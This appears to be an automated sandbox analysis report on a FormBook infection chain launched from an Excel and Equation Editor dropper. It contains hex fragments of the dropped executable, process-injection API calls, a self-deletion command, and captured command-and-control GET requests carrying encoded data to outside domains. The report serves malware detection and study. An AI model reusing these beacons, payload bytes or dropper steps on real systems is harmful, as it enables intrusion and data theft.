26 02 7b 03 00 00 04 16 fe 01 0d 09 2c 08 14 13 04 38 dc 01 00 00 73 41 00 00 06 25 02 7b 01 00 00 04 02 7c 02 00 00 04 28 19 00 00 0a 5a 02 7b 01 00 00 04 02 7c 02 00 00 04 28 1a 00 00 0a 5a 20 0a 20 26 00 73 1b 00 00 0a 7d 20 00 00 04 25 17 7d 1e 00 00 04 0a 06 7b 20 00 00 04 28 1c 00 00 0a 13 05 00 11 05 28 1d 00 00 0a 6f 1e 00 00 0a 00 16 13 06 2b 63 16 13 07 2b 43 00 11 07 11 06 58 18 5d 16 fe 01 13 08 11 08 2c 2b 11 05 28 1f 00 00 0a 11 07 02 7b 01 00 00 04 5a 11 06 02 7b 01 00 00 04 5a 02 7b 01 00 00 04 02 7b 01 00 00 04 6f 20 00 00 0a 00 00 11 07 17 58 13 07 11 07 02 7c 02 00 00 04 28 19 00 00 0a fe 04 13 09 11 09 2d a8 11 06 17 58 13 06 11 06 02 7c 02 00 00 04 28 1a 00 00 0a fe 04 13 0a 11 0a 2d 88 00 de 0d 11 05 2c 08 11 05 6f 21 00 00 0a 00 dc 73 42 00 00 06 13 0b 11 0b 02 7c 02 00 00 04 28 19 00 00 0a 02 7c 02 00 00 04 28 1a 00 00 0a 73 22 00 00 0a 7d 21 00 00 04 11 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfa0 @ @LO H.text `.rsrc@@.reloc:@BHLbpOY0V}*s}}}(({rpo{rpo0(&{,8sA%{\|(Z{\|(Z &s} %}{ ((o+c+CX],+({Z{Z{{o X\|(-X\|(-,o!sB\|(\|(s"}!
Oct 13, 2021 20:15:52.855690002 CEST	3	IN	Data Raw: 0b 17 7d 1e 00 00 04 11 0b 0b 16 13 0c 2b 46 16 13 0d 2b 26 00 07 7b 21 00 00 04 11 0d 11 0c 11 0d 1f 0a 2f 08 11 0c 1f 0a fe 04 2b 01 16 28 23 00 00 0a 00 11 0d 17 58 13 0d 11 0d 02 7c 02 00 00 04 28 19 00 00 0a fe 04 13 0e 11 0e 2d c5 11 0c 17 Data Ascii: }+F+&{!/+(#X\|(-X\|(-sC%{&o$%{&o$%{}"%{}#%\|(}$%\|(}%+lB}(%B
Oct 13, 2021 20:15:52.855705023 CEST	4	IN	Data Raw: 0a 00 02 7b 09 00 00 04 1e 1d 1e 1d 73 42 00 00 0a 6f 43 00 00 0a 00 02 7b 09 00 00 04 72 cb 00 00 70 6f 44 00 00 0a 00 02 7b 09 00 00 04 20 04 01 00 00 1f 26 73 15 00 00 0a 6f 45 00 00 0a 00 02 7b 09 00 00 04 19 6f 46 00 00 0a 00 02 7b 09 00 00 Data Ascii: {sBoC{rpoD{ &soE{oF{sHoI{ s@oA{sBoC{rpoD{ 7soE{oF{rpo{oJ{
Oct 13, 2021 20:15:52.855823994 CEST	5	IN	Data Raw: 00 00 0a 00 72 a7 03 00 70 28 61 00 00 0a 00 16 28 62 00 00 0a 00 28 63 00 00 0a 26 17 28 62 00 00 0a 00 28 5e 00 00 0a 00 2a 4e 00 28 29 00 00 06 6f 32 00 00 06 00 28 3c 00 00 06 00 2a 00 13 30 02 00 39 00 00 00 04 00 00 11 00 28 5e 00 00 0a 00 Data Ascii: rp(a(b(c&(b(^N()o2(<09(^(`(?(arp(a(b+(d&+0((erpo4,K((er!po4,3((er5po4,((erKpo4
Oct 13, 2021 20:15:52.855849028 CEST	7	IN	Data Raw: 17 00 00 04 1c 80 18 00 00 04 00 73 6d 00 00 0a 80 16 00 00 04 2a 00 00 00 13 30 02 00 b3 00 00 00 0e 00 00 11 00 28 29 00 00 06 0a 06 02 6f 37 00 00 06 16 fe 01 0b 07 2c 11 00 72 03 09 00 70 28 3b 00 00 06 00 38 8c 00 00 00 7e 17 00 00 04 17 58 Data Ascii: sm0()o7,rp(;8~X,nrp(]-)rp(]-r.p(]-+rp(]-,+8~Y+~X+~X+~Y+()o20~()o4
Oct 13, 2021 20:15:52.855875015 CEST	8	IN	Data Raw: 30 02 00 49 00 00 00 15 00 00 11 00 00 02 7b 1b 00 00 04 6f 79 00 00 0a 0a 2b 19 12 00 28 7a 00 00 0a 0b 00 03 07 28 5d 00 00 0a 0c 08 2c 04 17 0d de 1f 00 12 00 28 7b 00 00 0a 2d de de 0f 12 00 fe 16 08 00 00 1b 6f 21 00 00 0a 00 dc 16 0d 2b 00 Data Ascii: 0I{oy+(z(],({-o!+*&40rprprpop-oq{or,Q{oj+#(krporp(t(l-o!
Oct 13, 2021 20:15:52.855899096 CEST	10	IN	Data Raw: 2c 00 00 04 02 fe 06 57 00 00 06 73 8a 00 00 0a 7d 40 00 00 04 02 7b 2b 00 00 04 02 7d 4b 00 00 04 02 7b 2b 00 00 04 02 6f 8b 00 00 0a 7d 4c 00 00 04 2a 26 00 02 28 8c 00 00 0a 00 2a 13 30 06 00 bd 00 00 00 1e 00 00 11 00 03 2c 0b 02 7b 28 00 00 Data Ascii: ,Ws}@{+}K{+o}L&(0,{(+,()o*8{(,To={({"[{({"Zo=3+o<{({#[{({#Zo<++,$r\prp (,+
Oct 13, 2021 20:15:52.855927944 CEST	11	IN	Data Raw: fe 01 13 11 11 11 2c 19 00 02 7b 28 00 00 04 7b 27 00 00 04 02 28 47 00 00 06 6f ac 00 00 0a 26 00 2b 14 03 03 16 25 0a 6f a2 00 00 0a 00 06 6f a3 00 00 0a 00 2b 00 2a 00 00 00 01 28 00 00 00 00 4f 01 a6 f5 01 1a 2d 00 00 01 00 00 38 02 1c 54 02 Data Ascii: ,{({'(Go&+%oo+*(O-8T-j-0!({,of,8{+ok,8ko @,os}/\|0{(,8'o(
Oct 13, 2021 20:15:52.855952024 CEST	12	IN	Data Raw: 12 02 28 b2 00 00 0a 17 28 23 00 00 0a 2b 1f 11 0f 7b 21 00 00 04 12 02 28 b1 00 00 0a 12 02 28 b2 00 00 0a 16 28 23 00 00 0a 2b 02 2b 00 00 38 b8 00 00 00 02 28 46 00 00 06 75 0d 00 00 02 14 fe 03 13 12 11 12 39 94 00 00 00 00 02 28 46 00 00 06 Data Ascii: ((#+{!(((#++8(Fu9(Fto .+j(G,Y{ ((G{({"Z{({#Zo=o<o,o!+++rp(*
Oct 13, 2021 20:15:52.855977058 CEST	14	IN	Data Raw: 28 00 00 04 7b 22 00 00 04 5a 02 7b 29 00 00 04 5a 02 28 44 00 00 06 13 0a 12 0a 28 b1 00 00 0a 58 12 14 28 b2 00 00 0a 02 7b 28 00 00 04 7b 23 00 00 04 5a 02 7b 29 00 00 04 5a 02 28 44 00 00 06 13 0a 12 0a 28 b2 00 00 0a 58 02 7b 28 00 00 04 7b Data Ascii: ({"Z{)Z(D(X({({#Z{)Z(D(X{({"{)Z{({#{)Zo ((({,oc{+oi}1({,{Go({+{No{,oe{+oj
Oct 13, 2021 20:15:52.874900103 CEST	15	IN	Data Raw: 0a 00 02 7b 3d 00 00 04 18 6f 46 00 00 0a 00 02 7b 3d 00 00 04 72 ab 0f 00 70 6f 17 00 00 0a 00 02 7b 3d 00 00 04 17 6f 4a 00 00 0a 00 02 7b 3e 00 00 04 1f 20 20 83 00 00 00 73 40 00 00 0a 6f 41 00 00 0a 00 02 7b 3e 00 00 04 1e 1d 1e 1d 73 42 00 Data Ascii: {=oF{=rpo{=oJ{> s@oA{>sBoC{>rpoD{> 7soE{>oF{>rpo{>oJ{>]sHoK{?oL{? # s@oA{?

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49166	45.39.212.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:17:07.242702007 CEST	501	OUT	GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== HTTP/1.1 Host: www.ahljsm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:17:07.413518906 CEST	501	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Oct 2021 18:17:05 GMT Content-Type: text/html Content-Length: 371 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 cb de d6 dd da cb b4 cd cd f8 c2 e7 bc bc ca f5 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49167	108.170.14.102	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:17:12.630357981 CEST	502	OUT	GET /ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV HTTP/1.1 Host: www.publicationsplace.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:17:12.802043915 CEST	502	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Oct 2021 18:17:12 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 66 36 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ef6c/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49169	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:17:25.444068909 CEST	504	OUT	GET /ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV HTTP/1.1 Host: www.upinmyfeels.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:17:25.557760954 CEST	504	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 18:17:25 GMT Content-Type: text/html Content-Length: 275 ETag: "61672139-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49170	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:17:30.602564096 CEST	505	OUT	GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== HTTP/1.1 Host: www.lacucinadesign.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:17:30.718043089 CEST	505	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 18:17:30 GMT Content-Type: text/html Content-Length: 275 ETag: "61672139-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49171	172.67.213.229	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:17:35.773063898 CEST	506	OUT	GET /ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV HTTP/1.1 Host: www.restaurant-utopia.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:17:35.798839092 CEST	507	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Oct 2021 18:17:35 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 13 Oct 2021 19:17:35 GMT Location: https://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8N9tMGYALV79iE%2FeL51FVIuI8Gp1jK7n6KTOZIE%2Bj9%2BqgxSWxk5JN%2BajX3YZ6hX4EhWE5OQUZVxUwBeJF5Iiy6iNACHH89o%2FadrnvQs4cXwOCEy2RUvq5Awu8yg2uKJ0zaSPSo1nf5T85IbM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69da90ce9caf5b7a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1912 Parent PID: 596

General

Start time:	20:15:24
Start date:	13/10/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f450000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2676 Parent PID: 596

General

Start time:	20:15:45
Start date:	13/10/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2628 Parent PID: 2676

General

Start time:	20:15:47
Start date:	13/10/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xd60000
File size:	474112 bytes
MD5 hash:	6429AA83E4BC083B4F0B3F44B0D7950F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 1988 Parent PID: 2628

General

Start time:	20:15:52
Start date:	13/10/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xd60000
File size:	474112 bytes
MD5 hash:	6429AA83E4BC083B4F0B3F44B0D7950F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1764 Parent PID: 1988

General

Start time:	20:15:53
Start date:	13/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2724 Parent PID: 1764

General

Start time:	20:16:18
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x4a730000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1412 Parent PID: 2724

General

Start time:	20:16:22
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4a730000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2628 Parent PID: 2676 vbc.exeCOMMON

Executed Functions

Function 00250198, Relevance: 1.0, Instructions: 1000COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a06d7be8f00a847e41ab1d96f93fbf017643bbc2827c976377a2b2c05fcf334
Instruction ID: 0c1cc36ca60c1e0ffda6be3187f77ee082540445803c3ec543afe5a8ca5a379c
Opcode Fuzzy Hash: 5a06d7be8f00a847e41ab1d96f93fbf017643bbc2827c976377a2b2c05fcf334
Instruction Fuzzy Hash: BBA2E734A106199FDB24DF64C894BD9B7B2FF8A304F1185E9D4096B360EB74AE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00250821, Relevance: .9, Instructions: 926COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67ff678c55da195766e81b4dc6d8c698ccc9e98842db487ddf626e12a1062c19
Instruction ID: ec5a714e34a017b995336031a58ad4dd79803130f80b816562dbf3e8b2fde46b
Opcode Fuzzy Hash: 67ff678c55da195766e81b4dc6d8c698ccc9e98842db487ddf626e12a1062c19
Instruction Fuzzy Hash: 3FA2E634A106199FDB24DF64C894BD9B7B1EF8A304F1186E9D4096B360EB74AEC5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0025C128, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025C3EF

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9735e8d00c79c4e84251b49403c8f2e6f24297fe9d0d2e7bc67af53ce9197ce2
Instruction ID: 2da194ffef6ec5b5d9a6e9f204b640fed8399bfaa7a9fcddd57f41fd98369767
Opcode Fuzzy Hash: 9735e8d00c79c4e84251b49403c8f2e6f24297fe9d0d2e7bc67af53ce9197ce2
Instruction Fuzzy Hash: 24C12870D1022D8FCB20DFA4C841BEDBBB1BF49304F1095A9E919B7240EB749A99CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0025BD90, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025BE63

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ad6aac7eb034b574d3581993a0236d40d76b2074cdb4896b36a9df9d11183080
